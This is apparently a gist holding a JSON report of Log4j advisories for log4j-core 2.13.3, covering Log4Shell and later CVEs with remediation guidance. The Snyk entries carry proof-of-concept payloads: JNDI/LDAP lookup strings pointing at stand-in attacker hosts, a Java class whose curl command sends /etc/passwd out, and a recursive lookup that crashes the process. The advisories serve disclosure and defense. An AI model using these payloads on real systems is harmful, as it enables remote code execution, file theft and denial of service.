@bobmcwhirter
Created September 28, 2023 19:21
{
"affected": {
"pkg:maven/org.apache.logging.log4j/log4j-core@2.13.3": [
"ghsa-7rjr-3q55-vv33",
"ghsa-8489-44mv-ggj8",
"ghsa-jfh8-c2jp-5v3q",
"ghsa-p6xc-xr62-6r2g",
"cve-2021-44832",
"cwe-94",
"cve-2021-45105",
"cwe-400",
"cve-2021-45046",
"ghsa-7rjr-3q55-vv33",
"cve-2021-44228",
"ghsa-jfh8-c2jp-5v3q"
]
},
"vulnerabilities": [
{
"origin": "osv",
"id": "GHSA-8489-44mv-ggj8",
"modified": "2023-04-11T01:37:36.948945Z",
"published": "2022-01-04T16:14:20Z",
"withdrawn": null,
"summary": "Improper Input Validation and Injection in Apache Log4j2",
"details": "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\nThis issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited.",
"aliases": [
"CVE-2021-44832"
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/logging-log4j2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/28/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220104-0001/"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-45046",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 9,
"additional": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C"
}
],
"references": [
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-45105",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 7.5,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "JIRA Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3230"
}
]
},
{
"origin": "osv",
"id": "GHSA-p6xc-xr62-6r2g",
"modified": "2023-04-11T01:41:26.660958Z",
"published": "2021-12-18T18:00:07Z",
"withdrawn": null,
"summary": "Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion",
"details": "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.",
"aliases": [
"CVE-2021-45105"
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/19/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211218-0001/"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5024"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/"
}
]
},
{
"origin": "osv",
"id": "GHSA-7rjr-3q55-vv33",
"modified": "2023-06-27T20:14:56.111970Z",
"published": "2021-12-14T18:01:28Z",
"withdrawn": null,
"summary": "Incomplete fix for Apache Log4j vulnerability",
"details": "# Impact\n\nThe fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. \n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Mitigation\n\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\nLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.",
"aliases": [
"CVE-2021-45046"
],
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/18/1"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5022"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
]
},
{
"origin": "snyk",
"id": "GHSA-7rjr-3q55-vv33",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 9,
"additional": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C"
}
],
"references": [
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-44832",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. <br /> **Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 6.6,
"additional": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "GitHub Commit",
"url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16"
},
{
"type": "Jira Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "Openwall Mail",
"url": "https://www.openwall.com/lists/oss-security/2021/12/28/1"
}
]
},
{
"origin": "snyk",
"id": "CVE-2021-44228",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
}
]
},
{
"origin": "snyk",
"id": "CWE-94",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited 